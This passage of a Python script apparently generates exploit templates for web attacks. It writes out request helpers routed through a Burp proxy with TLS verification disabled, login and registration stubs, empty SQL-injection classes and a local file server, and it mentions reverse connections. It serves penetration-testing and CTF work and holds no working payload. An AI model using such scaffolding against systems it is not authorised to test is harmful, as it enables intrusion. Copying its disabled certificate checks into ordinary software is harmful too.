    # "ip_address=<addr>" overrides auto-detection of the local address.
    # BUGFIX: the value is everything after "="; previously the code indexed
    # [1] on the feature *string*, which yielded its second character
    ip_address_arg = next(filter(lambda f: re.match(r"ip_address=(.*)", f), features), None)
    ip_address = "util.get_address()" if not ip_address_arg else "'" + ip_address_arg.split("=", 1)[1] + "'"
    variables = {
        "IP_ADDRESS": ip_address,
        "BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"'
    }

    # optional proxy support; "burp" selects the Burp default listener.
    # BUGFIX: same [1]-on-string bug as ip_address above
    proxy_arg = next(filter(lambda f: re.match(r"proxy=(.*)", f), features), None)
    if proxy_arg or "burp" in features:
        proxy_url = "http://127.0.0.1:8080" if not proxy_arg else proxy_arg.split("=", 1)[1]
        variables["PROXIES"] = json.dumps({"http": proxy_url, "https": proxy_url})
        proxy = """
    if "proxies" not in kwargs:
        kwargs["proxies"] = PROXIES
"""
    else:
        proxy = ""

    # vhost support: request() may target "<vhost>.<host>" instead of BASE_URL
    if "vhost" in features or "subdomain" in features:
        url_parts = urllib.parse.urlparse(base_url)
        host_name = url_parts.netloc
        variables["HOST_NAME"] = f"'{host_name}' if \"LOCAL\" not in sys.argv else \"127.0.0.1:1337\""
        vhost_param = ", vhost=None"
        full_url = f"f'{url_parts.scheme}://{{vhost}}.{{HOST_NAME}}{{uri}}' if vhost else BASE_URL + uri"
    else:
        vhost_param = ""
        full_url = "BASE_URL + uri"

    # the request() helper every template contains
    methods.insert(0, f"""def request(method, uri{vhost_param}, **kwargs):
    if not uri.startswith("/") and uri != "":
        uri = "/" + uri
    client = requests
    if "session" in kwargs:
        client = kwargs["session"]
        del kwargs["session"]
    if "allow_redirects" not in kwargs:
        kwargs["allow_redirects"] = False
    if "verify" not in kwargs:
        kwargs["verify"] = False
{proxy}
    url = {full_url}
    return client.request(method, url, **kwargs)
""")

    if "register" in features or "account" in features:
        main_code.append("""if not register(USERNAME, PASSWORD):
        exit(1)""")
        variables["USERNAME"] = '"Blindhero"'
        variables["PASSWORD"] = '"test1234"'
        methods.append("""
def register(username, password):
    res = request("POST", "/register", data={"username": username, "password": password})
    if res.status_code != 200:
        print("[-] Error registering")
        exit()
    return True
""")

    if "login" in features or "account" in features:
        main_code.append("""session = login(USERNAME, PASSWORD)
    if not session:
        exit(1)""")
        variables["USERNAME"] = '"username"'
        variables["PASSWORD"] = '"password"'
        methods.append("""
def login(username, password):
    session = requests.Session()
    res = request("POST", "/login", data={"username": username, "password": password}, session=session)
    if res.status_code != 200:
        print("[-] Error logging in")
        exit()
    return session
""")

    if "sqli" in features:
        partial_imports["hackingscripts.sqli"] = ["MySQLi", "PostgreSQLi", "BlindSQLi", "ReflectedSQLi"]
        methods.append("""
class ReflectedSQLiPoC(MySQLi, ReflectedSQLi):
    def __init__(self):
        # TODO: specify reflected columns with their types
        super().__init__([None, str, int])
    def reflected_sqli(self, columns: list, table=None, condition=None, offset=None, verbose=False):
        # TODO: build query and extract columns from response
        return None
""")
        methods.append("""
class BlindSQLiPoC(MySQLi, BlindSQLi):
    def blind_sqli(self, condition: str, verbose=False) -> bool:
        # TODO: build query and evaluate condition
        return False
""")
        main_code.append("""poc = ReflectedSQLiPoC()
    print(poc.get_current_user())""")

    if "http-server" in features or "file-server" in features:
        partial_imports["hackingscripts.fileserver"] = ["HttpFileServer"]
        main_code.append("""file_server = HttpFileServer("0.0.0.0", 3000)
    file_server.enableLogging()
    file_server.addRoute("/dynamic", on_request)
    file_server.addFile("/static", b"static-content")
    file_server.startBackground()""")
        methods.append("""
def on_request(req):
    # TODO: auto generated method stub
    return 200, b"", { "X-Custom-Header": "1" }
""")

    if len(main_code) == 0:
        main_code = ["pass"]

    # BUGFIX: the join must happen outside the f-string below — a backslash
    # inside an f-string expression is a SyntaxError before Python 3.12
    main_body = "\n    ".join(main_code)
    main = f"""
if __name__ == "__main__":
    {main_body}
"""

    imports = "\n".join(f"import {i}" for i in sorted(imports, key=len))
    imports += "\n" + "\n".join(sorted(list(f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len))
    variables = "\n".join(f"{k} = {v}" for k, v in variables.items())
    header = f"""#!/usr/bin/env python
#
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY {' '.join(sys.argv)}
# For more information, visit: https://git.romanh.de/Roman/HackingScripts
#
{imports}
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
{variables}
"""
    return header + "".join(methods) + main
if __name__ == "__main__":
    arg_parser = argparse.ArgumentParser(
        description="Exploit Template for web attacks",
        formatter_class=argparse.RawTextHelpFormatter
    )
    available_features = [
        "ip_address=[...]: Local IP-Address for reverse connections",
        "burp|proxy=[...]: Tunnel traffic through a given proxy or Burp defaults",
        "subdomain|vhost: Allow to specify a subdomain for outgoing requests",
        "register|account: Generate an account registration method stub",
        "login|account: Generate an account login method stub",
        "sqli: Generate an template SQL-Injection class",
        "http-server|file-server: Generate code for starting an in-memory http server"
    ]
    arg_parser.add_argument("url", type=str, help="Target URL")
    arg_parser.add_argument(
        "-f",
        "--features",
        nargs="*",
        type=str,
        default=[],
        help="Optional list of features:\n- " + "\n- ".join(available_features)
    )
    options = arg_parser.parse_args()
    # default to http:// when no scheme was supplied
    target_url = options.url if "://" in options.url else "http://" + options.url
    print(generate_template(target_url, options.features))